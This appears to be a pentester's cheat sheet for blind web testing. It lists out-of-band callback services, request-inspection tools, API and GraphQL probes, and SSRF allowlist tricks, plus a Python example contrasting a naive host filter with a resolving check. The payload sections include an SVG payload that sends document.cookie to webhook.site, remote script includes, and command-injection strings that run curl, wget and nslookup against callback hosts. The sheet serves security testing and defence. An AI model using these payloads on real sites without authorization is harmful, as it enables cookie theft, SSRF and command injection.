web::services

web OOB · SSRF webhooks
01 Start Here
Purpose
Use this sheet when the target is blind:
- blind SSRF
- blind XSS
- blind RCE / deserialization
- background webhooks
- API calls you want to inspect quickly

This complements your main web + Burp sheets.
It focuses on external helpers, not vuln theory.
Core stack
webhook.site      # quick HTTP callbacks
interactsh-client # DNS / HTTP / SMTP OOB
httpbin.org       # inspect request shape
CyberChef         # decode / transform
crt.sh            # cert transparency
Wayback           # old endpoints / JS
Quick workflow
1. Generate a unique marker
2. Pick webhook.site or interactsh
3. Inject callback URL in parameter / header / HTML
4. Poll logs
5. If hit appears:
   - confirm source
   - inspect method / headers / body
   - escalate payload
6. Save payload and marker in notes
02 OOB / Callback
webhook.site
Use for
- fast HTTP callbacks
- full request body / headers
- manual testing and replay

Examples
https://webhook.site/<id>
https://webhook.site/<id>?tag=ssrf1
https://webhook.site/<id>/x.js
interactsh
Use for
- DNS proof
- HTTP proof
- SMTP callbacks
- CLI / automation

Run
interactsh-client
interactsh-client -json
interactsh-client -o interactions.json

Typical payload
http://<id>.oast.site
Blind XSS listeners
XSS Hunter style payload
<script src=https://<id>.xss.ht></script>

Simple proof-only payloads
<img src=https://webhook.site/<id>/x>
<svg onload=fetch('https://webhook.site/<id>?c='+document.cookie)>
03 Request Inspection
httpbin
Useful endpoints
https://httpbin.org/anything
https://httpbin.org/headers
https://httpbin.org/get
https://httpbin.org/post
https://httpbin.org/status/403
https://httpbin.org/redirect-to?url=https://example.com
curl checks
curl -s https://httpbin.org/anything \
  -H "X-Test: abc123" \
  -d '{"a":1}'

curl -s https://httpbin.org/headers \
  -H "Authorization: Bearer test"
CyberChef
Good for
- URL decode repeatedly
- Base64 / gzip / JWT
- hex ↔ raw
- XOR
- JSON beautify

Typical chain
URL Decode → From Base64 → Gunzip → Parse JSON
04 API Helpers
REST triage
Look for
- /openapi.json
- /swagger / /docs / /redoc
- content-type strictness
- method allowlist
- auth in cookie / header / both
- CORS

Probe
curl -i -X OPTIONS https://target/api/users
GraphQL probes
curl -s https://target/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query{__typename}"}'

curl -s https://target/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name}}}"}' | jq
API bug classes
- IDOR
- mass assignment
- authZ mismatch
- hidden methods
- weak CORS
- GraphQL introspection on prod
- debug docs exposed
05 DNS / Host Tricks
Wildcard DNS
nip.io
127.0.0.1.nip.io

sslip.io
127.0.0.1.sslip.io

Use for
- SSRF allowlist tricks
- host validation tests
- callback hostnames when raw IP is blocked
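As an added example (not part of this sheet), the allowlist bypass the nip.io / sslip.io entries rely on, next to the server-side fix: a string blocklist passes 127.0.0.1.nip.io, while a check that resolves the name and judges the returned addresses rejects it. The resolver below is an offline stand-in that mimics what nip.io / sslip.io return; the function names and the public address are assumptions.

```python
import ipaddress
import re
import socket
from typing import Callable
from urllib.parse import urlsplit

# Strings a naive filter typically compares the hostname against.
NAIVE_BLOCKLIST = {"localhost", "127.0.0.1", "0.0.0.0", "169.254.169.254"}

# nip.io / sslip.io embed the target IP in the name: 127.0.0.1.nip.io,
# app-10-0-0-5.sslip.io. The name itself never appears in a blocklist.
WILDCARD_IP_RE = re.compile(
    r"(?:^|[.-])(\d{1,3}(?:[.-]\d{1,3}){3})\.(?:nip\.io|sslip\.io)$")


def naive_is_safe(url: str) -> bool:
    """The 'before' form: compares the hostname string to a blocklist."""
    host = (urlsplit(url).hostname or "").lower()
    return host not in NAIVE_BLOCKLIST


def offline_resolver(host: str) -> list[str]:
    """Stand-in for DNS so the example runs offline (assumption: returns the
    IP encoded in a nip.io / sslip.io name, as those services do)."""
    m = WILDCARD_IP_RE.search(host)
    if m:
        return [m.group(1).replace("-", ".")]
    if host == "localhost":
        return ["127.0.0.1"]
    return ["93.184.216.34"]  # constructed stand-in for any other public host


def live_resolver(host: str) -> list[str]:
    """Real DNS lookup for production use (not exercised offline)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def resolving_is_safe(url: str,
                      resolve: Callable[[str], list[str]] = offline_resolver) -> bool:
    """Hardened form: resolve the name and require every answer to be a
    global address. Loopback, private, link-local (169.254.x, cloud metadata)
    and reserved ranges all fail ip_address().is_global. Callers should also
    connect to the address they validated, so a later re-resolution cannot
    swap in a different answer."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https") or not host:
        return False
    try:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    except ValueError:
        return False
    return bool(addrs) and all(a.is_global for a in addrs)
```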
Host / origin probes
X-Forwarded-Host: <id>.oast.site
Host: 127.0.0.1.nip.io
Origin: https://evil.example
Referer: https://webhook.site/<id>
06 Recon Services
crt.sh
Find:
- api.
- dev.
- old.
- admin.
- staging.
- internal-looking names
Wayback
Check:
- old JS bundles
- deprecated endpoints
- old login / admin paths
- robots.txt history
- docs accidentally published then removed
07 Decision Tree
Pick the right helper fast
Need full HTTP request details now? → webhook.site

Need DNS / SMTP OOB or CLI automation? → interactsh

Need blind XSS victim metadata? → XSS Hunter style service

Need to inspect what your script sends? → httpbin

Need SSRF allowlist / host validation tricks? → nip.io / sslip.io

Need forgotten endpoints or subdomains? → Wayback / crt.sh
Rule: Start with webhook.site for human-readable HTTP debugging; switch to interactsh when you suspect the server only makes DNS or background OOB requests.
08 Automation
Marker helper
ID=YOUR_UUID
TAG=$(date +%s)-ssrf
URL="https://webhook.site/$ID?tag=$TAG"
echo "$URL"
GraphQL template
curl -s https://target/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query{__typename}"}' | jq
Poller ideas
curl -s "https://webhook.site/token/$TOKEN_ID/requests?sorting=newest" | jq
interactsh-client -json
interactsh-client -o hits.json
09 Payloads
Blind SSRF
http://<id>.oast.site
https://webhook.site/<id>?src=ssrf1
http://127.0.0.1.nip.io
Blind XSS
<img src=https://webhook.site/<id>/x>
<script src=https://<id>.xss.ht></script>
Blind command proof
; curl https://webhook.site/<id>
&& wget https://webhook.site/<id>
| nslookup <id>.oast.site